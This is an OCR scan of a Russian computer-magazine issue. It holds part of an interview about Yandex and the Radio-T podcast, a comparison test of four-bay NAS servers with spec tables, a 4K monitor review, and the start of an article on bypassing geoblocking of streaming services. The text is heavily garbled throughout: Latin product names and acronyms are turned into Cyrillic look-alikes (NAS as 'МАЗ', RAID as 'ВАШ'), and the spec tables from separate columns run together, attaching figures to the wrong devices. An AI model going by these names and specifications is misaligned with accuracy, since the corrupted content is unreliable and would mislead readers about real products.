АЗРИпих (дочернее предприятие $\/\Зо{, которое теперь на- 
зывается Рага!е!$), потом какое-то время работал сам на себя, 
а после знакомые ребята пригласили меня пойти в Яндекс. 

Образование у меня непрофильное, никакого отноше- 
ния к Тяне имею. По большому счету, никакой «тяги к Т» 
уменя не существует. Меня прет от двух вещей: от интересных 
технологий и от продуктов, которые могут принести пользу 
людям. 

Чтобы приносить пользу людям сейчас, приходится 
заниматься 1Т. Потому что это самый легкий способ досту- 
чаться до каких-нибудь 10-15 миллионов человек. Ведь Ян- 
декс — большая компания, здесь не бывает сервисов, которы- 
ми пользуется меньше миллиона человек. 


КАКПОПАСТЬВЯНДЕКС? 

Попасть на работу в Яндекс очень просто: нужно быть 
специалистом. В любой области. Где бы ты ни хотел рабо- 
тать, ты должен быть профи в этой области. Пока ты им не ста- 
нешь, ты вряд ли сюда попадешь. 

Но есть еще много разных вещей, по которым отсе- 
иваются люди. Кроме профессиональных навыков (то есть 
программист должен уметь программировать, знать алго- 
ритмы), важно и другое. Например, очень сложно работать 
с людьми, которые категорически не умеют общаться. 


Кто-то сейчас начнет кричать, что задача программи- 
ста — писать код, а не общаться. Но так не бывает. Не быва- 
ет, чтобы человек вообще не общался внутри команды. Если 
этого нет, скорее всего, часть этой команды делает одно, 
часть — совсем другое. Из-за этого рушится весь процесс 
разработки. 

Я часто говорю, что хороший программист может пи- 
сать код не более четырех часов в день. В остальное время 
у него уже выключается мозг, и он не в состоянии заниматься 
креативной деятельностью. На самом деле люди, которые ни- 
когда не программировали и не работали, считают, что четыре 

часа — это очень мало. Но это очень 
много. По собственному опыту 
знаю, что программировать четыре 
часа в день — это взрыв мозга. Мозг 
просто через уши вытекает. 

С собеседованиями у нас все 
довольно просто. Собеседова- 
ние делится на несколько этапов, 
проверяются разные скиллы: будь 


ЧЕЛОВЕК СЛУ- 


ШАЮТ ПОДКАСТ 
«РАДИО-Т». 
ИЗ НИХ ОКОЛО 
2000 ЧЕЛОВЕК 
СЛУШАЮТ ПОД- 
КАСТ В ПРЯМОМ 
ЭФИРЕ. 
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то умение общаться, умение ра- 
ботать в условиях стресса (потому 
что любое собеседование всегда 
стресс) или умение писать код. 

Бывают вакансии, где код 
писать не просят, но про- 
сят решить какую-то задач- 
ку. Не в смысле «сколько мячи- 
ков поместится на гору Фудзи», 
а какую-то реальную логическую 
задачу простого типа. Если берут 
человека, которого хотят взять 
потенциальным системным архи- 
тектором, ему предлагают спро- 
ектировать какой-нибудь сервис. 
Просто взять и крупными блоками, 
крупными мазками его обозна- 
чить. Так мы понимаем, подходит 
нам человек или нет. 


РАДИО-Т 

Аудитория подкаста уже боль- 
ше, чем на эфирном радио. 
Знаете, как-то я оказался на од- 
ном радио. Меня пригласили 
в утреннее шоу и спросили: «Ну 
а чем вы там в интернете занима- 
етесь?» Я рассказал, что мы де- 
лаем шоу и что у него аудитория 
больше их всего-то в четыре раза. 
Они ТАК обиделись: обида просто 
на лице читалась! 

Радио-Т — это шоу. Со всеми 
вытекающими последствиями. Оно 
часто бывает спланированным. На- 
пример, до начала мы чаще всего 
договариваемся, кто будет «за», 
а кто «против» определенной темы. 
Потому что если все будут «за», это 
будет плохо звучать. 

Иногда приходится созна- 
тельно, заготовив заранее, го- 
ворить глупости. Чтобы люди по- 
том полезли в интернет и начали 
рассказывать, какие мы все тупые. 
С одной стороны, это тяжело. Ду- 
маешь: «Блин, теперь все будут на- 
зывать меня тупицей!» С другой стороны, потом столько радо- 
сти, потому что понимаешь — люди не просто так что-то пишут, 
они пошли, подготовились, прочитали, рассказали нам, какие 
мы все тупицы, и почувствовали себя лучше и умнее. 

К подкастингу сложно уже относиться как к хобби. Не- 
давно я сидел и выписывал цифры о Радио-Т для доклада и об- 
наружил, что в этом году будет уже семь лет, как мы этим занима- 
емся. Ну как можно семь лет заниматься одним и тем же хобби? 

Нельзя сказать, что Радио-Т — проект некоммерче- 
ский. У нас есть аудиовставки, есть заказные темы (когда 
к нам приходят люди и просят обсудить их тему). Но есть важ- 
ный момент: Радио-Т — это очень жесткое шоу. Даже если 
ты спонсор некой темы, это не значит, что мы осветим ее пози- 
тивно. Единственное, что мы гарантируем, — это упоминание 
темы. Может быть, все обсуждение выльется в «да ну, фигня 
какая-то — кто это вообще придумал?». 

Запись мы ведем по $Куре. Обычно весь поток соби- 
рается у одного из нас и напрямую транслируется в при- 
мерно полсотни транслирующих серверов. В онлайне нас 
слушает не так много людей — порядка двух тысяч человек. 


Какая-то часть этих людей сидит в чате и радостно пишет 
сообщения, что тоже невероятно увлекательный процесс. 
Там сложилась своя небольшая тусовка, есть очень умные 
люди, есть... менее умные. 

Когда мы выкладываем новый выпуск, толпа людей 
бросается его качать. Непосредственно с наших серверов 
качает около ста тысяч человек. Еще тысяч двести качают 
через различные торренты... В общем, у нас довольно боль- 
шая аудитория, и мы построили настоящий народный СОМ, 
чтобы раздавать эти файлы. Поэтому когда ты приходишь 
на Радио-Т, чтобы скачать очередной выпуск, ты не знаешь, 
с чьего сервера на самом деле его скачиваешь. 

Конечно, буквально все нам говорят, что очень нужно 
видео, но видео продакшен очень дорог. Взять хотя бы че- 
ловеческие ресурсы. Нужно нанимать оператора плюс чело- 
века, кто будет сидеть «на эфире», — оператора эфира, кото- 
рый будет подкладывать нужные картинки, пока мы говорим. 
А излишне напрягаться не хочется. У всех есть другая работа, 
и выкладываться настолько в рамках этого побочного проек- 
та — сложно. 

Это просто большое дело. 
Каждый преследует что-то свое, 
понятное, и чаще всего этого дости- 
гает. Моя цель — сделать так, чтобы 
люди, сосредоточенные вокруг это- 
го шоу, становились умнее, образо- 
ваннее и чаще обращали внимание 
на то, что происходит. И мне кажет- 
ся, помогает. = 


ЧЕЛОВЕК РАБО- 
ТАЮТ В ОФИСАХ 
ЯНДЕКСА, 
РАСПОЛОЖЕН- 
НЫХ В СЕМИ 
СТРАНАХ МИРА. 
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МАЗЯРОМ 


СРАВНИТЕЛЬНОЕ ТЕСТИРОВА- 


НИЕ ЧЕТЫРЕХДИСКОВЫХ МАЗ 


Четырехдисковые МА$ -серверы — серьезные Сергей Плотников 
решения. А потому критерии выбора данно- 

го устройства должны быть взвешенными. 

И если ты надумал приобрести такое храни- 

лище, то наш сравнительный тест тебе 


в помощь! 


МЕТОДИКАТЕСТИРОВАНИЯ 

Для измерения производительности МАЗ мы ис- 
пользовали уже проверенный временем бенчмарк 
|11е! МАЗ Реогтапсе ТооКИ (пе! МАЗРТ). Он спо- 
собен как следует нагрузить сетевое хранилище: 
от банального копирования файлов и папок 
на сетевой диск до потокового воспроизведения 
и записи НО-видео. Для того чтобы узнать макси- 
мальную производительность четырехдисковых 
серверов, мы установили винчестеры в режим 
ВАО 0. А вот массив ВАО 5, в свою очередь, про- 
демонстрировал нам, насколько быстро система 
справляется с чередованием и «невыделенным 
диском четности». 

Следом за скоростными показателями 
устройства оценивалась добротность прошив- 
ки: набор утилит и сервисов, время отклика веб- 
интерфейса и его интуитивность, — все это очень 
важно при выборе готового МА$. На наш тестовый 
ПК, а также на все сетевые хранилища с сайтов 
производителя были установлены последние вер- 
сии вспомогательных программ и прошивок. 


55 Г. 


АЗЦЗТОВ А5-604Т 
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ВИЕРАЕО ИМКЗТАТПОМ 
РВО @ЦАВ 


высокая 


большая аппаратная 
поддержка хранилища, 
есть 9$В 3.0 Внешне А$-604Т выглядит лаконично, 
высокая устройство спокойно впишется в рам- 
производительность ки любого интерьера. Передняя панель 


простой в управлении 
веб-интерфейс 
медиаплеер Вохее 


тестовые МФУ работали 

только в режиме печати 

малое число поддержки 
|Р-камер 


пластиковая, но имеет матовую фактуру. 
Из примечательных особенностей отме- 
тим наличие УЗВ 3.0 порта с клавишей 
быстрого резервного копирования, на- 
личие двухстрочного матричного дис- 
плея и кнопок управления. Индикация 
активности жестких дисков реализована 
через диоды, расположенные на съем- 
ных корзинах для НОР. В настройках 
всегда можно изменить уровень яркости 


производительность 

поддержка большого 

числа периферийных 
устройств 


© 


жесткие диски без потери 
гарантии самостоятельно 
незаменить 
нет $В 3.0 
шумная работа 
нетподдержки ВАО 6 


В нашу лабораторию прибыл МАЗ под 
номером 1$-О\4.ОТЕ/А5-ЕЧ, а это зна- 
чит, что он «запакован» четырьмя тера- 
байтными винчестерами. Но в продаже 
можно найти модели 1$-О\8.0ТЬ/А5-ЕЧ 
и 1$-О\/1211УА5-ЕЧ с общей емкостью 
дискового пространства 8 Тб и 12 Тб со- 
ответственно. Во всех случаях использу- 
ется одно и то же железо. Наше тестиро- 
вание показывает, что процессор Магуе! 
обладает весьма высокой производи- 
тельностью. 


как экрана, так и индикаторов. Задняя 

панель А$-604Т напоминает |/О-панель 
любой более-менее современной материнской платы: хранилище может 
похвастать сразу двумя В/-45, пятью УЗВ (один — третьей ревизии), двумя 
е5АТА и НОМГ!. Последний позволит использовать данный МАЗ в качестве 
сетевого плеера (благо АЗ-604Т оснащен аддоном Вохее). Также на задней 
панели есть трехконтактный штекер для подключения кабеля питания (блок 
питания у А$-604Т встроенный) и решетка для 120-миллиметрового венти- 
лятора. «Карлсон» имеет стандартный 4-пиновый разъем, в настройках мож- 
но регулировать частоту вращения. Во всех режимах система охлаждения 
девайса работает бесшумно. 

С установкой винчестеров и настройкой параметров сети проблем 
не возникнет. Для этого потребуется установить программу Сотхго! Сещег. 
Далее утилита сразу же предложит зарегистрироваться и получить соб- 
ственный 0. В дальнейшем он понадобится при установке дополнительных 
приложений. 

Веб-интерфейс А$-604Т — АОМ (АЗУЗТОН Ва Ма$ег) — дружелюбен 
и отзывчив. Внешне напоминает рабочий стол смартфона, а по функциона- 
лу соответствует передовым достижениям ОС конкурентов — долгожителей 
рынка. Что же касается наполнения операционной системы, то тут есть все, 
что должно уметь топовое устройство. К тому же ты можешь самостоятель- 
но установить дополнительные приложения. На момент написания статьи их 
более 90. Неплохо для компании, которая была основана в 2011 году! 

В целом следует отметить, что АЗУЗТОВ способна предоставить поль- 
зователю высокопроизводительные, многофункциональные решения. К не- 
достаткам можно отнести небольшое число поддерживаемой компьютерной 
периферии. Однако с выходом новых прошивок АОМ все наладится. 


Передняя панель Ипк$З{анНоп Рго Оиаа 

пластиковая. Здесь расположен один 

порт УЗВ 2.0 для подключения внешних накопителей и резервирования дан- 

ных (клавиша Рипсйоп). Также есть двухцветный индикатор активности хра- 
нилища и индикаторы активности работы накопителей. 

На задней панели расположен еще один ЧЦЗВ 2.0 и порт Епегте от ги- 
габитного сетевого контроллера. Есть тумблер активности МАЗ’а. В поло- 
жении Ао при бездействии устройство может самостоятельно «уснуть». 
За охлаждение винчестеров отвечает небольшой вентилятор. Работает 
«карлсон», на наш взгляд, достаточно шумно. 

Для того чтобы добраться до жестких дисков, необходимо снять пласти- 
ковую переднюю панель, а затем извлечь салазки. В нашем случае были 
установлены четыре жестких диска \М/еет Оока! \/О10ЕАН$ серии Самаг 
Сгееп. По умолчанию используется массив ВАШ 5, однако хранилище под- 
держивает и другие массивы хранения данных, за исключением НАШ 6. 

Веб-интерфейс ипкЗ{анНоп Рго Оиаа, пожалуй, можно назвать самым кон- 
сервативным. Внешне «админка» напоминает классическое окно с несколь- 
кими вкладками, в то время как модным трендом становится использование 
импровизированного рабочего стола. В наличии следующие меню: «Общие 
папки», «Пользователи/группы», «Сеть», «Система» и «Расширения». 

Для обновления ОС Ипк$аноп Рго Очцад требуется скачать полноценное 
приложение. После запуска ЕХЕ-файла лишь необходимо подождать, пока 
программа перепрошьет устройство. ИпкЗайоп Рго Оцаа может похвастать 
поддержкой медиасервера, ВИТотет, Тите Маспте, Типе$, принт-сервера, 
МоуаВАСКУР и МебАссе$$, фирменного облачного сервиса. 

ВиНаю ИпкЗаноп Рго Оцаа — устройство из коробки. Нужно лишь до- 
стать МА$, подключить к сети и пользоваться в свое удовольствие. 


МА$ еНест 
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МЕТСЕАВ 
КМ04000-200Е0$ 


качество МА$ 
наличие О0$В 3.0 
доступная цена 


© Передняя панель устройства выполне- 
на из глянцевого пластика. В верхней 
части расположены клавиша включе- 
ния/отключения устройства, индикато- 
ры активности работы жестких дисков, 
а также порт ЦЗВ 2.0 и кнопка Баскчр. 
Центральная часть отведена под доки 
для винчестеров. Используются клас- 
сические выдвижные салазки. В ниж- 
ней части расположен двухстрочный 
дисплей без органов управления. В мо- 
менты работы он оповещает пользователя о том или ином процессе: пе- 
резагрузке системы, проверке НОО, форматировании и так далее. Задняя 
панель хранилища оснащена удобной ручкой для переноски. За отвод го- 
рячего воздуха из внутреннего пространства МА$’а отвечает небольшой, 
но шумный вентилятор. Здесь же, на «корме», нашлось место для двух 
портов УЗВ 3.0 и одного Ву-45. Есть возможность обезопасить устройство 
при помощи кенсингтонского замка. 

За производительность ВеадуМА$ М\+ у2 отвечает процессор Магуе!й 
Агтада ХР, функционирующий на частоте 1,6 ГГц. Сам камень не греется, 
и для его охлаждения хватает алюминиевого «гребешка» высотой всего один 
сантиметр. Наклеены радиаторы и на ОЗУ. В системе используется лишь 
256 Мб «мозгов» без возможности дальнейшего апгрейда. МАЗ состоит 
из двух плат: основной со всеми процессорами и контроллерами и дискрет- 
ной, со слотами ЗАТА, подключаемой по интерфейсу РС! Ехрге5$ х4. 

После установки жестких дисков и сканирования накопителей ВАЮагвы- 
дал ошибку Соггирт Вост. Пришлось перезагружать МАЗ и ждать, пока диски 
будут проверены. Настройка массивов производится только при помощи 
ВА!аг. В случае с ВАШ 5 придется подождать несколько часов, пока все ди- 
ски будут проверены. Однако в это время можно спокойно, хотя и медленно 
работать с сервером. 

Веб-интерфейс ВМО4000-200ЕЦ$ — аи \/5 — классический. Пред- 
лагаем ссылку с аддонами: (/з. Среди интересных программ 
можно найти О\ВИйк, превращающий МА в видеорекордер, ВеачумМА$ 
ЗигуеШапсе, при помощи которого можно управлять !Р-камерами, и Едп\е 
Сочца Ее Зегуег — облачный сервис, без которого сегодня не обходится 
ни один МАЗ (С1СК.ги/ С). 

ВеадуМА$ М\+ у2 может как поставляться без дисков, так и комплекто- 
ваться предустановленными винчестерами общим объемом 2 и 4 Тб. 


самые низкие 
результаты втесте 
нетподдержки ВАО 6 
шумная работа 
использование 
статического 1Р 
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ОМАР 
Т5-469 РКО 


богатый функционал 
прошивки и самого МА$ 


высокая 
производительность 
устройства Т$-469 Рго построен на базе процессо- 
поддержка ра ме Ают 02700. Камень работает 


на частоте 2133 МГц, имеет два физи- 
ческих ядра, четыре потока (спасибо 
Нурег-Тпгеаатоа). Для МАЗ это топовое 
© решение. Действительно, производи- 
тельность «атома» настолько велика, 
что в некоторых тестах Т$-469 Рго до- 
стигает потолка пропускной способности 
гигабитной сети. По умолчанию в Т$-469 
Рго один гигабайт ОЗУ, но объем можно 
расширить до 3 Гб. Используются модули формата $0-Г01ММ. 

На передней панели помимо четырех отсеков для установки жестких 
дисков (под ключ) есть дисплей, кнопка Ро\мег и УЗВ 2.0 порт с функцией 
резервного копирования. Рядом с ЁЕБ есть «качелька» управления экраном. 
Из дополнительных информационных элементов можно отметить индикато- 
ры активности жестких дисков, а также «мигалки» З{а\и$, ГАМ, УЗВ, еАТА. 
Салазки для накопителей поддерживают как 3,5-дюймовые, так и 2,5-дюй- 
мовые накопители. 

Задняя панель Т$-469 Рго напоминает ГО какой-нибудь материнской пла- 
ты. Разве что вентиляторы в наличии. Один предназначен для охлаждения на- 
копителей, второй — для охлаждения встроенного блока питания. Работают 
они бесшумно. Итого хранилище может похвастать парой В.-45, шестью ЦЗВ, 
два из которых последней, третьей ревизии, и два е$ АТА. МА$ имеет сразу 
три видеовыхода: один \/СА для обслуживания хранилища и НОМГ для под- 
ключения, например, к телевизору. Предусмотрен замок типа Кепзт оп. 

Можно с уверенностью сказать, что у Т$-469 Рго среди участников тести- 
рования в плане функционала конкурентов нет. 

Ничем не хуже и программная составляющая устройства. На момент на- 
писания статьи была актуальна прошивка ТигфоМАЗ 3.8. «Фирмвар» может 
похвастать полной поддержкой \М/паом/$ 8. Ознакомиться с и ивеб- 
интерфейсом можно при помощи демоприложения: а 1 

Небольшой апдейт. К моменту выхода этого номера в печать запланиро: 
вано обновление «фирмвара» до версии 4.0. У новой прошивки кардинально 
поменялся внешний вид. Веб-интерфейс ТифоМА$ 4.0 напоминает скорее 
полноценную операционную систему для мобильных устройств. Есть рабочий 
стол с множеством иконок. Открытие любой вкладки фиксируется подобно 
вкладкам интернет-браузера. В итоге любой сервер ОМАР может заменить 
сетевой плеер или НТРС. 


всевозможных 
внешних устрой ств 


необнаружено 
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ЗУМОГОСУ 
О1ЗКЗТАПОМ 05413] 


поддержка большого 
числанакопителей 
большой функционал О$М 


поддержка облачных Комплектация 0$413] стандартна: 
технологий внешний блок питания, патч-корд, 
большоечисло винты для крепления жестких дисков 


дополнительных пакетов 
доступная стоимость 


нето$В 3.0 
габаритный внешний блок 
питания 
несовсем удобная схема 
замены дисков 
все порты выведены через 
заднюю панель 


и компакт-диск с ПО. Корпус храни- 
лища — самый необычный среди всех 
участников тестирования. Лицевая па- 
нель и дно выполнены из белого пласти- 
ка, а остальная часть каркаса — из алю- 
миния. 0$413] наверняка приглянулся 
тебе. На наш взгляд, МАЗ будет гармо- 
нично смотреться вместе с продукцией 
компании Арре. Есть небольшой не- 
достаток: пластик глянцевый, а потому 
собирает пыль и отпечатки пальцев. 
На передней панели кроме клавиши 


включения есть индикаторы активности 

жестких дисков, [АМ и За1и$. Здесь рас- 

положены воздуховоды, через которые 
воздух всасывается и выходит через заднюю панель. 

На задней панели, кстати, расположены пара портов УЗВ 2.0, В.-45 
и разъем для подключения блока питания. К сожалению, нет поддержки 
Ц$В 3.0, но она реализована у старшей модели 0$413. 

В 0$413] два вентилятора, бесшумно работающие на выдув. За вре- 
мя тестирования жесткие диски прогрелись до 41 градуса. Для того чтобы 
установить диски, необходимо открутить четыре винта и опустить заднюю 
крышку. Не очень удобно. После этого мы получаем доступ к пластиковым 
корзинам, которые имеют крепежные отверстия как для 3,5-дюймовых, так 
и для 2,5-дюймовых запоминающих устройств. После установки дисков 
0$413] в течение минуты загружается. 

При нажатии на клавишу «Подключиться» через браузер мы попадаем 
в веб-интерфейс. Зупооду всегда славилась своими качественными про- 
шивками, и 0$413] имеет огромнейший функционал. Главная особенность 
любой ОЗМ четвертой версии — поддержка облачных услуг. Конкретно 
при помощи 0$413] ты можешь создать собственное облако, которое будет 
автоматически синхронизироваться между компьютерами и мобильными 
устройствами. Второй момент — это, конечно же, поддержка ряда муль- 
тимедийных функций: использование видео-, аудио- и фотоконтента. Про- 
изводительности хранилища хватит, чтобы одновременно записывать ТВ- 
программу через У$В-тюнер и воспроизводить НО-поток. 


ТНЕСУ$ 
№4800ЕСО 


слоты расширения для 
дискретных устройств 


высокая 
производительность Модель №4800Есо является проапгрей- 
много |/О женной версией сетевого хранилища 


№4800. Улучшенный МАЗ потребля- 
ет до 20% меньше энергии. При этом 
© за термоконтроль СРИ и логики отвечает 
полностью пассивная система охлажде- 
ния. Мы же с удовольствием отметим, 
что работает М№4800Есо практически 
бесшумно. 

Интересная фишка №4800Есо — на- 
личие слотов расширения. На плате есть 
«свободный» порт РС Ехргез$ х1 (без 
перемычки) и тт!-РС Ехрге$$, которые ты можешь использовать по своему 
усмотрению. Например, для установки еще одной сетевой карты. 

Передняя панель №4800Есо выполнена из пластика. Для установки жест- 
ких дисков необходимо приоткрыть дверцу и закрепить накопители в специ- 
альных салазках. Есть возможность «запереть» их под ключ. На передней 
панели расположено сразу два ЧЗВ-порта третьего поколения. Здесь же 
расположено два дисплея. Один отслеживает состояние активности винче- 
стеров и сети. Второй демонстрирует конкретные настройки МАЗ’а. 

В системе используется всего один вентилятор. Также на задней панели 
расположены еще два ЦЗВ (только уже второй версии), еЗАТА и два В.-45. 
Из видеовыходов отметим доисторический \СА, который может пригодить- 
ся скорее для обслуживания устройства, и НОМ1. В отличие от остальных 
МА$, у №4800Есо предусмотрен 3,5-миллиметровый линейный выход. 

После настройки параметров подключения к сети мы можем обратиться 
к веб-интерфейсу. Можно использовать традиционную «двухмерную» визу- 
ализацию Тпеси$0$ 5.0, а можно «трехмерную», построенную на обыкно- 
венном движке На$п. Во втором случае админка выглядит более привлека- 
тельной. Но для нас это не принципиально. Прошивка представлена в виде 
классического дерева с девятью вкладками. Есть возможность установки 
стандартных приложений и модулей. На момент написания статьи с офици- 
ального сайта компании можно было скачать и установить 20 модулей рас- 
ширения. Есть и приложения для мобильных гаджетов на базе Апагоа и!О5. 
Попробовать веб-интерфейс «на вкус» всегда можно, воспользовавшись 
онлайн-демонстрацией: с!ск.ги/8 СХ]. 

В целом функционал хранилища полностью соответствует топовому ре- 
шению. Радует большой список поддерживаемых внешних устройств, будь 
то принтеры, УР$’ы или же внешние накопители. 


бесшумная работа 


использование 
статического 1Р 
габаритный блок 
питания 
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ТЕХНИЧЕСКИЕ 
ХАРАКТЕРИСТИКИ 


АЗУЗТОВ А$-604Т Ви Раю ЫткКЗфаНоп Оцаа МЕТСЕАА ВМО4000-200ЕЦ $ 

Процессор: 1е! Ают 02700, 2,13 ГГц Магуей, 1,6 ГГц Процессор: Магуей, 1,6 ГГц 

Память: 0083, 1 Гб 0083 256 Мб 

Интерфейсы: 2х В/-45 (10/100/1000 Мбит/с), 1х В/-45 (10/100/1000 Мбит/с), 1х В\-45 (10/100/1000 Мбит/с), 2 х УЗВ 3.0, 
2х 05В 3.0, 4 х 05В 2.0, 2 хеЗАТА, 1 х НОМ! 2х 058 2.0 1х 05$В 2.0 

Уровни массивов: ВАШ 0/1/5/6/10, ВОО ВАШ 0/1/5/10, ВОВ Х-ВАШЮ 2, ВАШ 0/1/5, /ВОБ 

Поддерживаемые протоколы: АЕР, ЕТР, НТТР/НТТР$, 15С$1, Взупс, ЗН, АРР, Вопоиг, ЕТР/ЗЕТР, НТТР/НТТР$, ЗМВ/ АРР, Воп]оиг, ЕТР, НТТР/НТТР$, МЕ$, ЗМВ/СЕ$, 
ЗЕТР, ЗМВ/СЕ$, \МебрАУ СЕ$, ТСРЛР, УРпР ОРпрР, 15С$1, Тете, 5$5$Н, $ММР, ТЕТР 

Поддерживаемые сервисы: медиасервер, принт-сервер, сервер медиасервер, принт-сервер, сервер Пипез, медиасервер, принт-сервер, сервер 
видеонаблюдения, веб-сервер, сервер Пипез, ВИТогет, Тите Маснте, МоуаВАСКУР, видеонаблюдения, ВИТоггет, Т!те Масйте, 
Вохее, ВИТотет, Тите Маспте \МебАссе$$ сервер Пипез 

Возможная комплектация: без дисков 4 Тб, 8 Тб, 12 Тб без дисков, 2 Тб, 4 Тб 


ОМАРТ$-469 Рго Зупоюду О:5КЗ{аНоп 0$413] Твеси$ №4800Есо 

Процессор: пе! Ают 02700, 2,13 ГГц Магуей, 1,6 ГГц пе! Ают 02700, 2,13 ГГц 

Память: 0083, 1 Гб 0083, 512 Мб 0083, 2 Гб 

Интерфейсы: 2х В/-45 (10/100/1000 Мбит/с), 1х В/-45 (10/100/1000 Мбит/с), 2х В/-45 (10/100/1000 Мбит/с), 2 х ЦЗВ 3.0, 
2х 05В 3.0, 5 х ЗВ 2.0, 2 хеЗАТА, 1 х УСА, 2х 05В 2.0 2х 05В 2.0, 1 хеЗАТА, 1 х МСА, 1 х НОМ, 
1 х НОМ! 1х Ипеощ 

Уровни массивов: ВАШЮ 0/1/5/6/10, /ВОБ ЗН ВАЮ, ВАШ 0/1/5/6/10, /ВОБ ВАШ 0/1/5/6/10, /ВОВ 

Поддерживаемые протоколы: СЕЗ/ЪМВ, АЕР, МЕ$, ЕТР, НТТР, НТТР$, Тетё, СЛЕЗ, АЕР, ЕТР, 15С$1, Тета, 55Н, МЕ, ЗМВ/СЕ$, НТТР/НТТР$, ЕТР, ТЕТР, МЕ$, АЕР, 
ЗН, 15С$1, $ММР, УРИР, Воп]очг, \МебОА\, \\МебоА\, $ММР, Вупс, НТТР/НТТР$ 150$, Воплоиг, УРпР 
ОЕМА 

Поддерживаемые сервисы: медиасервер, принт-сервер, сервер медиасервер, принт-сервер, сервер Пипез, фотосервер, медиасервер, принт-сервер, 
видеонаблюдения, медиапортал, веб-сервер, видеонаблюдения, \Меб З{аНоп, ВИТоггеп/ сервер видеонаблюдения, почтовый сервер, 
сервер Типез, ВИТотет, Тите Масите еМие, Тите Васкир еМие 

Возможная комплектация: без дисков без дисков без дисков 


ХОРОШЕЕ МАЗ’ТРОЕНИЕ 


На примере сегодняшнего сравнительного се. А для дома хватит такого хранилища, как 
теста хорошо видно, что топовые процессоры Зупоюду О5КЗаНоп 0$413]. За свои возмож- 
пе! Ают способны прокачать гигабитную сеть ности и неболышную цену данный девайс полу- 
по максимуму. Также «атомные камни» заметно чает награду «Лучшая покупка». Если же идти 
опережают свои аналоги от Магуе!. Но и стоят на компромиссы — не твой стиль, то присмо- 
они дороже. Все-таки топовые решения будут трись к Н!-Епа-серверам от ОМАР АЗУЗТОН 


гармонично смотреться в каком-нибудь офи- и Треси$. == 


ХАРАКТЕРИСТИКИ 


Диагональ: 31,5" 
Соотношение сторон: 16:9 
Разрешение: 3840 х 2160 
Контрастность: 800:1 
Яркость: 350 кд/м? 

Время отклика: 8 мс 
Колонки: 2х2 Вт 

Разъемы: О!5р!ауРоп / В$- 
232С / 3,5 мм Ми!-Часк 
Размеры: 750 х 489 х 256 мм 


7130 ООО 
руб. 


ще недавно мы рассказывали о роутерах с под- 
держкой 802.11ас, о том, что уже сейчас есть 
смысл инвестировать в будущее своей домаш- 
ней сети. С 4К-мониторами ситуация немного 
сложнее, если смотреть глазами домашнего 
пользователя. Кино в 4К найти почти невозможно, а чтобы 
играть на таком разрешении, понадобится ультрамощная 
машина с несколькими видеокартами. Однако у профес- 
сионалов, работающих с графикой, есть хорошие причи- 
ны присматриваться к 4К уже сейчас. Точнее сказать, 8,3 
миллиона причин. 

Преимущество 4К не только в более высокой четко- 
сти, но и в большем количестве экранного пространства. 
Конечно, для серьезной работы все равно понадобится 
неслабое железо — производитель рекомендует дискрет- 
ные АМО не младше 7000-й серии или ММЕЛА СТХ хотя бы 
из 600-й линейки, поддерживающие вывод в 4К на уров- 
не драйверов. Также нужно учитывать, что в европейской 
версии (имеющей суффикс Е в названии) отсутствует порт 
НОМ, поэтому карточка должна иметь вывод ПО!5р!ауРоч. 
Также пользователям \\/тао\м$ нужно дождаться выхода 
версии 8.1, в которой заявлена поддержка высоких раз- 
решений. 

В АЗУ$ отдельно гордятся тонкостью своего монитора. 
Толщина 31,5-дюймового дисплея не превышает 35 мм. 


до 


Платформа монитора позволяет регулировать высоту 
(экран можно поднять максимум на 15 см), наклон (на 30 
градусов) и поворот (на 45 градусов в каждую сторону). 
На задней панели монитора предусмотрен аудиовход 
и разъем для наушников. В мониторе также разместились 
колонки с мощностью в 2 Вт. Встроенного УЗВ-хаба, увы, 
не предусмотрено. Также монитор имеет \ЕЗА-крепление, 
позволяющее повесить его на стену. 

Отдельно стоит отметить матрицу монитора, изготов- 
ленную по технологии 1@20, что дает более низкое энер- 
гопотребление. Кроме того, монитор может похвастаться 
хорошими углами обзора — под углом в 45 градусов по ди- 
агонали заметного искажения картинки не возникало. 

Как и стоило ожидать, 4К-экран дает исключительно 
четкую картинку, но АЗУ$ можно также похвалить за хоро- 
шую яркость на уровне в 350 кандел на квадратный метр 
и контрастность на уровне 800:1. 


ВЫВОДЫ 

Нельзя не отметить, что РОЗ21О0Е — дорогая игрушка. 
Но для профессионалов и экстремальных геймеров до- 
вольно оправданная. В продаже новинка появится в сен- 
тябре. Стоит дождаться, когда на уровне приложений 
и ОС появится поддержка 4К и станет возможным находить 
видеоконтент в таком высоком разрешении. == 


КУЛЬТ 
КАРГО 
НА ДИВАНЕ 


Обходим геоблокировку контент- 
сервисов на любых устройствах 


Мех, Нич, Рападога, ЗроТу... Ты наверняка не раз натыкался 
на эти названия. Магические сервисы, дающие за 8-10 долларов 
столько контента, сколько в тебя влезет. Давай посмотрим, как 
получить доступ к ним с любого устройства. 


ак можно догадаться из объема этой 

статьи, использование таких сервисов 

в России — не самое простое занятие. 

Поэтому перед тем, как обречь себя 

на весь этот геморрой, неплохо бы понимать, за- 
чем это делать. 

Проще всего объяснить необходимость 

в ЗроШу и Рапдога — у этих сервисов есть отлич- 

ные рекомендации музыки любого жанра. Условно 


говоря, если я включаю радио в «Яндекс.Музыке», 
то почти для любого жанра 7 из 10 треков будут 
с альбома, в продвижении которого Яндекс в дан- 
ный момент заинтересован больше всего. Вклю- 
чил блюз — получай Хью Лори, включил рок — слу- 
шай «Океан Эльзи». С Рапаога мне почти каждый 
раз удавалось находить для себя что-то новое. 


В случае с Нии и Майх все сложнее. Наивно 
ожидать, что на этих сервисах есть любой фильм 
или сериал, который тебе только придет в голо- 
ву. Этим не могут похвастаться даже сервисы 
оп аетапа, где за каждую запись нужно платить 
по отдельности. Профит Мейх в другом. На- 
верняка ты не раз оказывался в ситуации, когда 
компания сидит перед телевизором и полчаса 
тупит, решая, что же посмотреть. Этим достаточ- 
но унылым делом часто приходится заниматься 
и самому. В общем, свобода выбора не всегда 
благо, иногда хочется просто прокрутить меню, 
выбрать что-то из списка, кликнуть и тут же на- 
чать смотреть. 

Конечно, тут возникает еще одно препят- 
ствие — весь контент на английском. Однако 


сам я предпочитаю смотреть кино и сериа- 
лы в оригинале и уверен, что я такой далеко 
не один. Нии дает возможность еще и попро- 
бовать американское телевидение, совсем не- 
похожее на наш зомбоящик. Ток-шоу с Кона- 
ном О’Брайном и другие |а{е па $зПом, скетчи 
Зашгаау Мат Шуе и даже Атепса’$ Со{ Таетщ, 
выгодно отличающееся от наших аналогов мас- 
штабностью, эффектностью номеров и поч- 
ти полным отсутствием фриков. Все это даже 
в торрентах не найти. 

Хотя каждый наверняка хоть раз слышал 
об этих сервисах, имеет смысл рассказать под- 
